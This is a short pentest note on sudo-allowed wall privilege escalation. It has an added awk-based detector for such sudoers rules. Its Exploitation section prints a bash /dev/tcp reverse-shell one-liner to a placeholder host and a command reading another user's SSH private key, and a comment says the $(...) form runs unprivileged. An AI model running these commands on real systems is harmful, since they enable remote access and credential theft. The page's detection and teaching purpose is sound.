Sudo Wall Privilege Escalation
Last modified: 2023-02-05
The wall command can display the result of an OS command. If it can be executed as root via sudo, it might be vulnerable to privilege escalation (PrivEsc).
Investigation
sudo -l
(ALL) NOPASSWD: wall
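The same check from the defender's side, as an added example that is not part of the original page: a shell function that reads `sudo -l` output and reports every rule that permits wall, with the run-as user and whether a password is required. The rule-line layout "(runas) [TAG:] cmd[, cmd...]", the user alice, the host host1 and the sample rules are assumptions constructed for illustration.

```bash
#!/usr/bin/env bash
# Added example (not from the original page): flag sudo rules that allow wall.
# Assumes `sudo -l` rule lines of the form "(runas) [TAG:] cmd[, cmd...]".

find_sudo_wall() {
  awk '
    /^[ \t]*\(/ {
      line = $0
      sub(/^[ \t]*/, "", line)
      close_idx = index(line, ")")
      runas = substr(line, 2, close_idx - 2)
      rest = substr(line, close_idx + 1)
      nopass = "no"                      # tags are tracked per rule line
      n = split(rest, cmds, /,[ \t]*/)
      for (i = 1; i <= n; i++) {
        cmd = cmds[i]
        sub(/^[ \t]+/, "", cmd)
        # Consume leading tags (NOPASSWD:, PASSWD:, SETENV:, ...); they stay
        # in effect for later commands on the same line until overridden.
        while (match(cmd, /^[A-Z_]+:[ \t]*/)) {
          tag = substr(cmd, 1, RLENGTH)
          if (tag ~ /^NOPASSWD:/) { nopass = "yes" }
          else if (tag ~ /^PASSWD:/) { nopass = "no" }
          cmd = substr(cmd, RLENGTH + 1)
        }
        sub(/[ \t]+$/, "", cmd)
        split(cmd, words, /[ \t]+/)      # words[1] is the program, rest are args
        m = split(words[1], parts, "/")  # compare the basename only
        if (parts[m] == "wall")
          printf "runas=%s nopasswd=%s cmd=%s\n", runas, nopass, cmd
      }
    }
  '
}

# Constructed sample input (hypothetical user and host).
SAMPLE_SUDO_L='User alice may run the following commands on host1:
    (ALL) NOPASSWD: wall
    (root) /usr/bin/less, /usr/bin/wall
    (ALL : ALL) NOPASSWD: /usr/bin/systemctl status *
    (root) NOPASSWD: /usr/local/bin/wallpaper-sync'

printf '%s\n' "$SAMPLE_SUDO_L" | find_sudo_wall
```

On a live host the input would come from `sudo -l | find_sudo_wall`; any reported rule is a candidate for removal from sudoers.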
Exploitation
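# Note: "$(...)" is expanded by the invoking shell before sudo starts, so the inner command runs as the current user and wall only receives its output.
# Reverse shell
sudo wall "$(bash -c 'bash -i >& /dev/tcp/<local-ip>/<local-port> 0>&1')"
# Get an SSH private key of another user
sudo wall "$(cat /home/user/.ssh/id_rsa)"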